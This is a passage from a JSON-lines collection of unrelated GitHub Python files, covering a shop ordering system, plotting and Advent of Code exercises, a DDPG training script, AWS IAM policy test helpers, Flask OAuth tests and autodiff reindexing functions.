self.id = item_info.get(\"id\")\n self.name = item_info.get(\"name\")\n self.price = item_info.get(\"price\")\n self.product_category = item_info.get(\"product_category\")\n\n\nclass Customer:\n \"\"\"\n Represents a customer in the store.\n \"\"\"\n\n @handle_operation_errors\n def __init__(self, store, customer_info: CustomerInfoType):\n is_valid_customer(customer_info)\n\n self.store = store\n self.name = customer_info.get(\"name\")\n self.surname = customer_info.get(\"surname\")\n self.__email = customer_info.get(\"email\")\n self.__address = customer_info.get(\"address\")\n self.order = Order(self, store)\n\n\nclass Order:\n \"\"\"\n Represents a order of a customer.\n \"\"\"\n\n def __init__(self, customer, store):\n self.customer = customer\n self.store = store\n self.items = {}\n\n @handle_operation_errors\n def add_item(self, item_id: int):\n \"\"\"\n Add an item to the order by its ID.\n \"\"\"\n\n if not isinstance(item_id, int):\n raise ValueError(\"Item id must be of type number!\")\n\n item = self.store.get_item_by_id(item_id)\n\n if item:\n self.items[item_id] = item\n print(f\"\\n\\n{item.name} successfully added to your order!\\n\\n\")\n\n def get_total_price(self):\n \"\"\"\n Calculate the total price of the items in the order.\n \"\"\"\n\n total = sum(item.price for item in self.items.values())\n return total\n\n def view_order(self):\n \"\"\"\n View the items in the order and their total price.\n \"\"\"\n\n if not self.items.values():\n print(\"\\n\\nYour order is empty! Add some items!\\n\\n\")\n else:\n print(\"\\n\\nYour order:\")\n\n for item in self.items.values():\n print(f\" - {item.name} at: {item.price}! (id: {item.id})\")\n total = self.get_total_price()\n\n print(f\"Total: {total}\\n\\n\")\n\n @handle_operation_errors\n def remove_item(self, item_id: int):\n \"\"\"\n Remove an item from the order by its ID.\n \"\"\"\n\n if item_id in self.items:\n del self.items[item_id]\n print(f\"\\n\\nItem with id: {item_id} removed from order!\\n\\n\")\n else:\n raise KeyError(\"Item not found in order!\")\n\n def clear_order(self):\n self.items.clear()\n\n\nclass Payment:\n \"\"\"\n Represents the payment process for a customer's order.\n \"\"\"\n\n def __init__(self, customer):\n self.customer = customer\n self.order = customer.order\n\n def make_payment(self):\n \"\"\"\n Process a payment for the customer's order.\n \"\"\"\n\n item_list = [item.name for item in self.order.items.values()]\n\n print(item_list)\n if not self.order.items.values():\n print(\n \"\\n\\nError: Your order is empty. Add items to your order before making a payment!\\n\\n\"\n )\n else:\n item_list = [item.name for item in self.order.items.values()]\n items_string = \", \".join(item_list)\n total = self.order.get_total_price()\n self.order.clear_order()\n print(f\"\\n\\nSucess! You just bought: {items_string} for {total}\\n\\n\")\n","repo_name":"giuseppe-messi/python-online-shop-ordering-system","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30574721512","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 29 16:44:36 2018\n\n@author: Kalexa\n\"\"\"\n\nimport matplotlib . pyplot as plt\n#import numpy as np\n# Primero voy a crear tres listas vacias\nv1 = []\nv2 = []\nv3 = []\n# Despues creo una variable que llamo numero y empieza siendo cero\nnumero = 0\nnumero_final = 10\npaso = 0.01\n# v1 va a ser una lista de 11 numeros ordenados del 0 al 10\n# v2 va a ser el cuadrado de v1\nwhile numero <= numero_final :\n v1. append ( numero ) # agarro v1 , le agrego al final el valor de numero\n v2. append ( numero ** 2) # agarro v2 , le agrego al final numero al cuadrado\n v3. append ( numero ** 3) # idem , al cubo\n numero = numero + paso # numero va saltando de dos en dos\n# Grafico v2 en funcion de v1\n# Esto deberia ser una funcion cuadratica ya que punto a punto v2=v1 ^2\nplt. plot (v1 , v2 , \".\")\nplt. plot (v1 , v3 , \".\")\n# Muestro lo que grafico en pantalla\nplt. show ()\n# Primero puntos , despues afinar la grilla , y despues sacar el \".\"\n\n","repo_name":"Ivan9912/mis-archivos-de-python","sub_path":"Exactas Programa/Programas .py/TP Fisica MRU-V-Oscilatorio/Ejercicios concreto Fisica/funcion lineal ejemplo pp.py","file_name":"funcion lineal ejemplo pp.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1467608792","text":"\nimport re\n\n\ndef apply_mask(mask, value):\n occ_0 = [s.start() for s in re.finditer(\"0\", mask)]\n occ_1 = [s.start() for s in re.finditer(\"1\", mask)]\n for occ in occ_0:\n value = value[:occ]+\"0\"+value[occ+1:]\n for occ in occ_1:\n value = value[:occ]+\"1\"+value[occ+1:]\n return value\n\n\ndef apply_mask_2(mask, value):\n occ_X = [s.start() for s in re.finditer(\"X\", mask)]\n occ_1 = [s.start() for s in re.finditer(\"1\", mask)]\n for occ in occ_X:\n value = value[:occ]+\"X\"+value[occ+1:]\n for occ in occ_1:\n value = value[:occ]+\"1\"+value[occ+1:]\n return value\n\n\ndef exec_line_1(line, mask, mem):\n if \"mask\" in line:\n mask = line.split(\"mask = \")[-1]\n if \"mem\" in line:\n mem[re.search(r\"\\d+\", line).group(0)] = int(apply_mask(mask,\n format(int(line.split(\"= \")[-1]), \"036b\")), 2)\n return mask, mem\n\n\ndef exec_line_2(line, mask, mem):\n if \"mask\" in line:\n mask = line.split(\"mask = \")[-1]\n if \"mem\" in line:\n init_address = format(int(re.search(r\"\\d+\", line).group(0)), \"036b\")\n masked_address = apply_mask_2(mask, init_address)\n possible_addresses = get_addresses_rec(masked_address)\n value = int(line.split(\"= \")[-1])\n for address in possible_addresses:\n mem[str(int(address, 2))] = value\n return mask, mem\n\n\ndef get_addresses_rec(bits):\n if \"X\" not in bits:\n return [bits]\n else:\n idx_of_X = bits.index(\"X\")\n bits_0 = bits[:idx_of_X]+\"0\"+bits[idx_of_X+1:]\n bits_1 = bits[:idx_of_X]+\"1\"+bits[idx_of_X+1:]\n return get_addresses_rec(bits_0)+get_addresses_rec(bits_1)\n\n\nif __name__ == \"__main__\":\n with open(\"inputs/day14.txt\") as f:\n data = f.read().splitlines()\n mask_1 = \"\"\n mem_1 = {}\n mask_2 = \"\"\n mem_2 = {}\n for line in data:\n mask_1, mem_1 = exec_line_1(line, mask_1, mem_1)\n mask_2, mem_2 = exec_line_2(line, mask_2, mem_2)\n print(sum(mem_1.values()))\n print(sum(mem_2.values()))\n","repo_name":"Kornflex28/adventofcode2020","sub_path":"code/day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4324146735","text":"import tensorflow as tf\nimport gym\nimport numpy as np\nimport shutil\nimport os\n\n# reproducible results\nnp.random.seed(1)\ntf.set_random_seed(1)\n\n# Load Environment\nENV_NAME = 'BipedalWalker-v2'\nenv = gym.make(ENV_NAME)\n# Reproducible environment parameters\nenv.seed(1)\n\n\nSTATE_DIMENSION = env.observation_space.shape[0] \nACTION_DIMENSION = env.action_space.shape[0] \nACTION_BOUND = env.action_space.high \n\n######################################## Hyperparameters ########################################\n\n# number of episodes to be trained\nTRAIN_EPI_NUM=500\n# Learning rate for actor and critic\nACTOR_LR=0.05\nCRITIC_LR=0.05\nR_DISCOUNT=0.9 # reward discount\n\nMEMORY_CAPACITY=1000000\n\nACTOR_REP_ITE=1700 # after such many iterations, update ACTOR\nCRITIC_REP_ITE=1500\n\nBATCH=40 # size of batch used to learn\n\n# Path used to store training result (parameters)\nTRAIN_DATA_PATH='./train'\n\n\nGLOBAL_STEP = tf.Variable(0, trainable=False) # record how many steps we have gone through\nINCREASE_GLOBAL_STEP = GLOBAL_STEP.assign(tf.add(GLOBAL_STEP, 1))\n\n\n# set automatically decaying learning rate to ensure convergence\nACTOR_LR = tf.train.exponential_decay(LR_A, GLOBAL_STEP, 10000, .95, staircase=True)\nCRITIC_LR = tf.train.exponential_decay(LR_C, GLOBAL_STEP, 10000, .90, staircase=True)\n\n\nEND_POINT = (200 - 10) * (14/30) # The end point of the game\n\n\n##################################################\nLOAD_MODEL = True # Whether to load trained model#\n##################################################\n\n\nwith tf.Session() as sess:\n\n # Create actor and critic.\n actor = Actor(sess, ACTION_DIMENSION, ACTION_BOUND, ACTOR_LR, REPLACE_ITER_A)\n critic = Critic(sess, STATE_DIMENSION, ACTION_DIMENSION, CRITIC_LR, R_DISCOUNT, REPLACE_ITER_C, actor.a, actor.a_)\n\n actor.add_grad_to_graph(critic.a_grads)\n\n # Memory class implementation from: https://github.com/jaara/AI-blog/blob/master/Seaquest-DDQN-PER.py\n memory = Memory(MEMORY_CAPACITY)\n\n # saver is used to store or restore trained parameters\n saver = tf.train.Saver(max_to_keep=100) # Maximum number of recent checkpoints to keep. Defaults to 5.\n\n\n ################################# Determine whether it's a new training or going-on training ###############3\n if LOAD_MODEL: # Returns CheckpointState proto from the \"checkpoint\" file.\n checkpoints = tf.train.get_checkpoint_state(TRAIN_DATA_PATH, 'checkpoint').all_model_checkpoint_paths\n saver.restore(sess, checkpoints[-1]) # reload trained parameters into the tf session\n else:\n if os.path.isdir(TRAIN_DATA_PATH): \n shutil.rmtree(TRAIN_DATA_PATH) # recursively remove all files under directory\n os.mkdir(TRAIN_DATA_PATH)\n\n sess.run(tf.global_variables_initializer())\n\n explore_degree=0.1\n explore_degree_minimum=0.0001\n explore_decay_factor=0.99\n\n ################################# Main loop for training #################################\n for i_episode in range(MAX_EPISODES):\n \n state = env.reset()\n episode_reward = 0 # the episode reward\n \n while True:\n\n action = actor.act(s)\n\n action = np.clip(np.random.normal(action, explore_degree), -ACTION_BOUND, ACTION_BOUND) # explore using randomness\n next_state, reward, done, _ = env.step(a) \n\n trainsition = np.hstack((s, a, [r], s_))\n probability = np.max(memory.tree.tree[-memory.tree.capacity:])\n memory.store(probability, transition) # stored for later learning\n\n # when r=-100, that means BipedalWalker has falled to the groud\n episode_reward += reward\n\n\n # when the training reaches stable stage, we lessen the probability of exploration\n if GLOBAL_STEP.eval(sess) > MEMORY_CAPACITY/20:\n explore_degree = max([explore_decay_factor*explore_degree, explore_degree_minimum]) # decay the action randomness\n tree_index, b_memory, weights = memory.prio_sample(BATCH) # for critic update\n\n b_state = b_memory[:, :STATE_DIMENSION]\n b_action = b_memory[:, STATE_DIMENSION: STATE_DIMENSION + ACTION_DIMENSION]\n b_reward = b_memory[:, -STATE_DIMENSION - 1: -STATE_DIMENSION]\n b_next_state = b_memory[:, -STATE_DIMENSION:]\n \n td = critic.learn(b_state, b_action, b_reward, b_next_state, weights)\n actor.learn(b_state)\n \n for i in range(len(tree_index)): # update priority\n index = tree_idx[i]\n memory.update(index, td[i])\n\n\n # if GLOBAL_STEP.eval(sess) % SAVE_MODEL_ITER == 0:\n # ckpt_path = os.path.join(TRAIN_DATA_PATH, 'DDPG.ckpt')\n # save_path = saver.save(sess, ckpt_path, global_step=GLOBAL_STEP, write_meta_graph=False)\n # print(\"\\nSave Model %s\\n\" % save_path)\n\n if done:\n if \"running_reward\" not in globals():\n running_reward = episode_reward\n else:\n running_reward = 0.95*running_r + 0.05*ep_r\n \n print('running reward: ',running_reward,', episode reward: ',episode_reward)\n break # start new episode\n\n state = nextState\n sess.run(INCREASE_GLOBAL_STEP)\n\n\n","repo_name":"bluemapleman/Maple-Reinforcement-Learning","sub_path":"ActorCritic/duplicate for DDPG train/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":5362,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"20606488041","text":"def apply(args, data):\n \"\"\"Filter results based on the arguments provided\"\"\"\n filter_sort = args.get('sort')\n filter_name = args.get('name')\n filter_type = args.get('type')\n filter_arch = args.get('network_arch')\n filter_read_only = args.get('read_only')\n\n if filter_name is not None:\n data = list(filter(lambda d: d.get('name') == filter_name, data))\n if filter_type is not None:\n data = list(filter(lambda d: d.get('type') == filter_type, data))\n if filter_arch is not None:\n data = list(filter(lambda d: d.get('network_arch') == filter_arch, data))\n if filter_read_only is not None:\n filter_read_only_as_boolean = filter_read_only == 'true'\n data = list(filter(lambda d: d.get('read_only') == filter_read_only_as_boolean, data))\n\n if filter_sort == 'name-ascending':\n data = sorted(data, key=lambda d: '' + d.get('name') + ':' + d.get('version'), reverse=False)\n elif filter_sort == 'name-descending':\n data = sorted(data, key=lambda d: '' + d.get('name') + ':' + d.get('version'), reverse=True)\n elif filter_sort == 'date-ascending':\n data = sorted(data, key=lambda d: d.get('last_modified'), reverse=False)\n else: # filter_sort == 'date-descending'\n data = sorted(data, key=lambda d: d.get('last_modified'), reverse=True)\n\n return data\n","repo_name":"NVIDIA/tao_front_end_services","sub_path":"api/filter_utils/filtering.py","file_name":"filtering.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"70250900330","text":"import os\nfrom multiprocessing import Process, Value, Array\n\n\nprocs = 3\ncount = 0\n\n\ndef show_data(label, val, arr):\n msg = \"%-12s: pid: %4s, global:%s, value: %s, array:%s\"\n print(\"Process Array\", list(arr))\n print(msg % (label, os.getpid(), count, val.value, list(arr)))\n\n\ndef updater(val, arr):\n global count\n count += 1\n val.value += 1\n print(\"Val\", val.value)\n for i in range(3):\n arr[i] += 1\n print(\"Process Array\", list(arr))\n\n\nif __name__ == \"__main__\":\n scalar = Value(\"i\", 0)\n vector = Array(\"d\", procs)\n (\"parent start\", scalar, vector)\n show_data(\"parent\", scalar, vector)\n p = Process(target=show_data, args=(\"child\", scalar, vector))\n p.start()\n p.join()\n print('\\nloop1 (updates in parent, serial children)')\n for i in range(procs):\n count += 1\n scalar.value += 1\n vector[i] += 1\n p = Process(target=show_data, args=((\"process %s\" % i), scalar, vector))\n p.start()\n p.join()\n print(\"Value:\", scalar.value)\n print(\"Array:\", list(vector))\n print('\\nloop2 (updates in parent, parallel children)')\n ps = []\n for i in range(procs):\n count += 1\n scalar.value += 1\n vector[i] += 1\n p = Process(target=show_data, args=((\"process %s\" % i), scalar, vector))\n p.start()\n ps.append(p)\n for p in ps:\n p.join()\n print(\"Value:\", scalar.value)\n print(\"Array:\", list(vector))\n print('\\nloop3 (updates in serial children)')\n for i in range(procs):\n p = Process(target=updater, args=(scalar, vector))\n p.start()\n p.join()\n show_data(\"parent temp\", scalar, vector)\n\n print('\\nloop4 (updates in parallel children)')\n ps = []\n for i in range(procs):\n p = Process(target=updater, args=(scalar, vector))\n p.start()\n ps.append(p)\n for p in ps:\n p.join()\n show_data(\"parent end\", scalar, vector)\n","repo_name":"chcorophyll/algorithm_4th","sub_path":"PekingUniversity/recursion/multiprocess_test.py","file_name":"multiprocess_test.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19326370946","text":"import json\nimport sys\nimport boto3\nimport string\nimport random\n\nclient = boto3.client('iam')\naccount_id = boto3.client('sts').get_caller_identity().get('Account')\n\n\ndef out(statements):\n for s in statements:\n pretty = json.dumps(s.to_json(), indent=4)\n print(pretty)\n\n\ndef deploy(statements, type='policy'):\n if type == 'policy':\n deploy_policy(statements)\n elif type == 'assume':\n deploy_assume(statements)\n elif type == 'access':\n deploy_access(statements)\n else:\n raise Exception('Unknown deploy type: %s' % type)\n\n\ndef deploy_policy(statements):\n policy_name = new_random_name()\n\n log('Creating test policy %s...\\n' % policy_name)\n\n document = make_policy_document(statements)\n\n response = client.create_policy(\n PolicyName=policy_name,\n PolicyDocument=document,\n Description='Testing policy creation'\n )\n\n log('Deleting test policy %s...\\n' % policy_name)\n client.delete_policy(\n PolicyArn=response['Policy']['Arn']\n )\n\n\ndef deploy_assume(statements):\n role_name = new_random_name()\n\n log('Creating test role %s...\\n' % role_name)\n\n document = make_policy_document(statements)\n\n client.create_role(\n RoleName=role_name,\n AssumeRolePolicyDocument=document,\n Description='Testing assume policy creation',\n )\n\n client.delete_role(\n RoleName=role_name\n )\n\n\ndef deploy_access(statements):\n bucket_name = 'random-bucket-for-floyd-' + new_random_name().lower()\n\n log('Creating test bucket %s...\\n' % bucket_name)\n\n document = make_policy_document(\n statements, replace_s3_examples, bucket_name)\n\n s3 = boto3.client('s3')\n s3.create_bucket(Bucket=bucket_name)\n\n log('Attaching bucket policy...\\n')\n s3.put_bucket_policy(\n Bucket=bucket_name,\n Policy=document,\n )\n\n log('Deleting test bucket %s...\\n' % bucket_name)\n s3.delete_bucket(Bucket=bucket_name)\n\n\n# replace potential sensitive content in examples code\ndef replace_s3_examples(j, bucket_name):\n if 'NotPrincipal' in j['Statement'][0] and 'AWS' \\\n in j['Statement'][0]['NotPrincipal']:\n j['Statement'][0]['NotPrincipal']['AWS'][0] = \\\n j['Statement'][0]['NotPrincipal']['AWS'][0].replace(\n 'Bob', 'dev')\n j['Statement'][0]['NotPrincipal']['AWS'][0] = \\\n j['Statement'][0]['NotPrincipal']['AWS'][0].replace(\n '1234567890', account_id)\n\n if 'Resource' in j['Statement'][0]:\n j['Statement'][0]['Resource'] = \\\n j['Statement'][0]['Resource'].replace(\n 'example-bucket', bucket_name)\n return j\n\n\ndef make_policy_document(statements, filter=None, filter_options=None):\n j = {\n 'Version': '2012-10-17',\n 'Statement': list(map(lambda x: x.to_json(), statements))\n }\n\n if filter is not None:\n j = filter(j, filter_options)\n\n return json.dumps(j, indent=4)\n\n\ndef new_random_name():\n return ''.join(random.choice(\n string.ascii_uppercase + string.digits) for _ in range(10))\n\n\ndef log(data):\n sys.stderr.write(data)\n","repo_name":"udondan/iam-floyd","sub_path":"helper/python/python_test.py","file_name":"python_test.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"en","doc_type":"code","stars":524,"dataset":"github-code","pt":"53"} +{"seq_id":"13919438601","text":"import argparse\nimport math\n\nimport cv2\nfrom mmdeploy_runtime import Detector\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description='show how to use sdk python api')\n parser.add_argument('device_name', help='name of device, cuda or cpu')\n parser.add_argument(\n 'model_path',\n help='path of mmdeploy SDK model dumped by model converter')\n parser.add_argument('image_path', help='path of an image')\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = parse_args()\n\n img = cv2.imread(args.image_path)\n detector = Detector(\n model_path=args.model_path, device_name=args.device_name, device_id=0)\n bboxes, labels, masks = detector(img)\n\n indices = [i for i in range(len(bboxes))]\n for index, bbox, label_id in zip(indices, bboxes, labels):\n [left, top, right, bottom], score = bbox[0:4].astype(int), bbox[4]\n if score < 0.3:\n continue\n\n cv2.rectangle(img, (left, top), (right, bottom), (0, 255, 0))\n\n if masks[index].size:\n mask = masks[index]\n blue, green, red = cv2.split(img)\n if mask.shape == img.shape[:2]: # rtmdet-inst\n mask_img = blue\n else: # maskrcnn\n x0 = int(max(math.floor(bbox[0]) - 1, 0))\n y0 = int(max(math.floor(bbox[1]) - 1, 0))\n mask_img = blue[y0:y0 + mask.shape[0], x0:x0 + mask.shape[1]]\n cv2.bitwise_or(mask, mask_img, mask_img)\n img = cv2.merge([blue, green, red])\n\n cv2.imwrite('output_detection.png', img)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"open-mmlab/mmdeploy","sub_path":"demo/python/object_detection.py","file_name":"object_detection.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"} +{"seq_id":"9354059370","text":"import numpy as np\n\n\ndef crossover_mask(X, M):\n # convert input to output by flatting along the first axis\n _X = np.copy(X)\n _X[0][M] = X[1][M]\n _X[1][M] = X[0][M]\n\n return _X\n","repo_name":"AIasd/ADFuzz","sub_path":"pymoo/pymoo/operators/crossover/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":191,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"42077339151","text":"from mock import patch, Mock\nfrom nose.tools import assert_equal\nfrom hamcrest import assert_that, equal_to, ends_with, contains_string\n\nfrom tests.application.support.flask_app_test_case import(\n FlaskAppTestCase,\n signed_in)\n\nfrom application import app\nfrom application.controllers.authentication import get_authorization_url\nfrom application.redis_session import RedisSession\nfrom requests import ConnectionError, Timeout\nfrom performanceplatform.client.admin import AdminAPI\n\n\n@patch('requests_oauthlib.OAuth2Session.fetch_token')\n@patch('requests_oauthlib.OAuth2Session.get')\n@patch('requests_oauthlib.OAuth2Session.authorization_url')\nclass AuthenticationTestCase(FlaskAppTestCase):\n\n @signed_in()\n def test_signout_redirects_properly_and_clears_session(\n self,\n oauth_authorization_url_patch,\n oauth_get_patch,\n oauth_fetch_token_patch,\n client):\n response = client.get(\"/sign-out\")\n assert_that(response.status_code, equal_to(302))\n assert_that(\n response.headers['Location'], ends_with('/users/sign_out'))\n with client.session_transaction() as session:\n assert_that(\n session,\n equal_to({}))\n\n def test_signin_development_route(\n self,\n oauth_authorization_url_patch,\n oauth_get_patch,\n oauth_fetch_token_patch):\n response = self.client.get(\"/sign-in\")\n assert_that(response.status_code, equal_to(302))\n assert_that(\n response.headers['Location'], ends_with('/'))\n with self.client.session_transaction() as session:\n assert_that(\n session['oauth_token']['access_token'],\n equal_to(app.config['FAKE_OAUTH_TOKEN']))\n assert_that(\n session['oauth_user'],\n equal_to(app.config['FAKE_OAUTH_USER']))\n\n def test_authorize_sets_correct_session_if_user_can_sign_in(\n self,\n oauth_authorization_url_patch,\n oauth_get_patch,\n oauth_fetch_token_patch):\n token = \"token_token\"\n user = {\n 'permissions': ['signin'],\n 'uid': \"bleep_bloop_blarp\"\n }\n oauth_get_response = Mock()\n oauth_get_response.json = Mock(return_value={\n 'user': user\n })\n oauth_get_patch.return_value = oauth_get_response\n oauth_fetch_token_patch.return_value = token\n with self.client.session_transaction() as sess:\n sess['oauth_state'] = \"foo\"\n response = self.client.get(\n '/auth/gds/callback')\n self.assert_session_contains('oauth_user', user)\n self.assert_session_contains('oauth_token', token)\n self.assert_flashes('You have been successfully signed in')\n assert_equal(response.headers['Location'], 'http://localhost/')\n assert_equal(response.status_code, 302)\n\n def test_authorize_sends_client_id_with_user_json(\n self,\n oauth_authorization_url_patch,\n oauth_get_patch,\n oauth_fetch_token_patch):\n token = \"token_token\"\n user = {\n 'permissions': ['signin'],\n 'uid': \"bleep_bloop_blarp\"\n }\n oauth_get_response = Mock()\n oauth_get_response.json = Mock(return_value={\n 'user': user\n })\n oauth_get_patch.return_value = oauth_get_response\n oauth_fetch_token_patch.return_value = token\n with self.client.session_transaction() as sess:\n sess['oauth_state'] = \"foo\"\n response = self.client.get(\n '/auth/gds/callback')\n\n oauth_get_patch.assert_called_with(\n 'http://signon.dev.gov.uk/user.json?client_id=oauth_id')\n\n def test_authorize_does_not_sign_in_if_user_cannot_sign_in(\n self,\n oauth_authorization_url_patch,\n oauth_get_patch,\n oauth_fetch_token_patch):\n token = \"token_token\"\n user = {\n 'permissions': [],\n 'uid': \"bleep_bloop_blarp\"\n }\n oauth_get_response = Mock()\n oauth_get_response.json = Mock(return_value={\n 'user': user\n })\n oauth_get_patch.return_value = oauth_get_response\n oauth_fetch_token_patch.return_value = token\n with self.client.session_transaction() as sess:\n sess['oauth_state'] = \"foo\"\n response = self.client.get(\n '/auth/gds/callback')\n self.assert_session_contains('oauth_user', user)\n self.assert_session_contains('oauth_token', token)\n assert_equal(len(self.get_flashes()), 0)\n assert_equal(response.headers['Location'], 'http://localhost/')\n assert_equal(response.status_code, 302)\n\n def test_get_authorization_url_sets_oauth_state_returns_url(\n self,\n oauth_authorization_url_patch,\n oauth_get_patch,\n oauth_fetch_token_patch):\n oauth_authorization_url_patch.return_value = ('some url', 'state')\n session = {}\n assert_equal(get_authorization_url(session), 'some url')\n assert_equal(session, {'oauth_state': 'state'})\n\n\n@patch('performanceplatform.client.admin.AdminAPI.reauth')\n@patch('requests_oauthlib.OAuth2Session.get')\n@patch('application.redis_session.RedisSession.delete_sessions_for_user')\nclass SignonCallbacksTestCase(FlaskAppTestCase):\n\n def setUp(self):\n super(SignonCallbacksTestCase, self).setUp()\n self.headers = [('Authorization', 'Bearer foobar')]\n\n def test_reauth_with_invalid_user(\n self,\n session_delete_sessions_for_user_patch,\n oauth_get_patch,\n reauth_patch):\n # Set up the Mock for calling Signon\n self.mock_signon_json(\n oauth_get_patch).return_value = self.not_allowed_user_update_json()\n self.expected_unused(session_delete_sessions_for_user_patch)\n self.expected_unused(reauth_patch)\n\n response = self.do_reauth_post()\n self.assertEqual(403, response.status_code, response.data)\n\n def test_reauth_when_invalid_json(\n self,\n session_delete_sessions_for_user_patch,\n oauth_get_patch,\n reauth_patch):\n # Set up the Mock for calling Signon\n self.mock_signon_json(oauth_get_patch).side_effect = ValueError()\n self.expected_unused(session_delete_sessions_for_user_patch)\n self.expected_unused(reauth_patch)\n\n response = self.do_reauth_post()\n self.assertEqual(500, response.status_code, response.data)\n\n def test_reauth_with_valid_user(\n self,\n session_delete_sessions_for_user_patch,\n oauth_get_patch,\n reauth_patch):\n # Set up the Mock for calling Signon\n self.mock_signon_json(\n oauth_get_patch).return_value = self.allowed_user_update_json()\n\n response = self.do_reauth_post()\n\n self.assertEqual(200, response.status_code, response.data)\n\n session_delete_sessions_for_user_patch.assert_called_with('user-uid')\n reauth_patch.assert_called_with('user-uid')\n\n def test_reauth_when_signon_down(\n self,\n session_delete_sessions_for_user_patch,\n oauth_get_patch,\n reauth_patch):\n # Set up the Mock for calling Signon\n oauth_get_patch.side_effect = ConnectionError()\n self.expected_unused(session_delete_sessions_for_user_patch)\n self.expected_unused(reauth_patch)\n\n response = self.do_reauth_post()\n self.assertEqual(500, response.status_code, response.data)\n\n def test_reauth_when_signon_really_slow(\n self,\n session_delete_sessions_for_user_patch,\n oauth_get_patch,\n reauth_patch):\n # Set up the Mock for calling Signon\n oauth_get_patch.side_effect = Timeout()\n self.expected_unused(session_delete_sessions_for_user_patch)\n self.expected_unused(reauth_patch)\n\n response = self.do_reauth_post()\n self.assertEqual(500, response.status_code, response.data)\n\n def test_reauth_when_signon_unauthenticated(\n self,\n session_delete_sessions_for_user_patch,\n oauth_get_patch,\n reauth_patch):\n # Set up the Mock for calling Signon\n oauth_get_patch.return_value.status_code = 401\n self.expected_unused(session_delete_sessions_for_user_patch)\n self.expected_unused(reauth_patch)\n\n response = self.do_reauth_post()\n self.assertEqual(401, response.status_code, response.data)\n\n def mock_signon_json(self, mock_signon):\n return mock_signon.return_value.json\n\n def expected_unused(self, patched_mock):\n # assert that the mock wasn't used. If this is caused, then\n # things should fail in tests.\n patched_mock.side_effect = Exception(\"Unexpected usage\")\n\n def allowed_user_update_json(self):\n return self.create_user_json(['user_update_permission'])\n\n def not_allowed_user_update_json(self):\n return self.create_user_json([])\n\n def create_user_json(self, permissions):\n user = {}\n user['user'] = {}\n user['user']['permissions'] = permissions\n return user\n\n def do_reauth_post(self):\n return self.client.post(\n '/auth/gds/api/users/user-uid/reauth', headers=self.headers)\n","repo_name":"alphagov/performanceplatform-admin","sub_path":"tests/application/controllers/test_authentication.py","file_name":"test_authentication.py","file_ext":"py","file_size_in_byte":9449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11175087218","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport tadpole.util as util\nimport tadpole.autodiff as ad\nimport tadpole.tensor as tn\n\nfrom tadpole.index import (\n Index,\n IndexGen, \n Indices,\n)\n\n\n\n\n###############################################################################\n### ###\n### Tensor reindexing functions ###\n### ###\n###############################################################################\n\n\n# --- Reindexing and reshaping methods -------------------------------------- #\n\ndef vjp_reindex(g, out, x, indmap):\n\n return tn.reindex(g, util.unpacked_dict(util.inverted_dict(indmap))) \n\n\n\ndef vjp_transpose(g, out, x, *output_inds):\n\n return tn.transpose(g, *tn.union_inds(x))\n \n\n\ndef vjp_fuse(g, out, x, fusemap):\n\n inputs = Indices(*tn.union_inds(x))\n outputs = Indices(*tn.union_inds(out))\n splitmap = {}\n\n for inp, out in fusemap.items():\n\n inp = inputs.map(*inp)\n out, = outputs.map(out)\n\n splitmap[out] = inp \n\n return tn.transpose_like(tn.split(g, splitmap), x)\n\n\n\ndef vjp_split(g, out, x, splitmap):\n\n inputs = Indices(*tn.union_inds(x))\n outputs = Indices(*tn.union_inds(out))\n fusemap = {}\n\n for inp, out in splitmap.items():\n\n inp, = inputs.map(inp)\n out = outputs.map(*out)\n\n fusemap[out] = inp \n\n return tn.transpose_like(tn.fuse(g, fusemap), x)\n\n\n\ndef vjp_squeeze(g, out, x, inds=None):\n\n singletons = tuple(tn.complement_inds(x, out))\n\n return tn.transpose_like(tn.unsqueeze(g, singletons), x)\n\n\n\ndef vjp_unsqueeze(g, out, x, inds):\n\n return tn.transpose_like(tn.squeeze(g, inds), x)\n\n\n\ndef vjp_expand(g, out, x, inds):\n\n return tn.reshape_like(g, x)\n\n\n\ndef vjp_flatten(g, out, x, ind):\n\n if ind is None:\n ind = \"flat\" \n\n fusemap = {tuple(tn.union_inds(x)): ind}\n\n return vjp_fuse(g, out, x, fusemap)\n\n\n\n\n# --- Record reindexing and reshaping VJPs ---------------------------------- #\n \nad.makevjp(tn.reindex, vjp_reindex)\nad.makevjp(tn.transpose, vjp_transpose) \nad.makevjp(tn.fuse, vjp_fuse)\nad.makevjp(tn.split, vjp_split)\nad.makevjp(tn.squeeze, vjp_squeeze)\nad.makevjp(tn.unsqueeze, vjp_unsqueeze)\nad.makevjp(tn.expand, vjp_expand)\nad.makevjp(tn.flatten, vjp_flatten)\n\n\n\n","repo_name":"dkilda/tadpole","sub_path":"tadpole/tensorwrap/vjps/reindexing.py","file_name":"reindexing.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18267777868","text":"class Solution:\n # 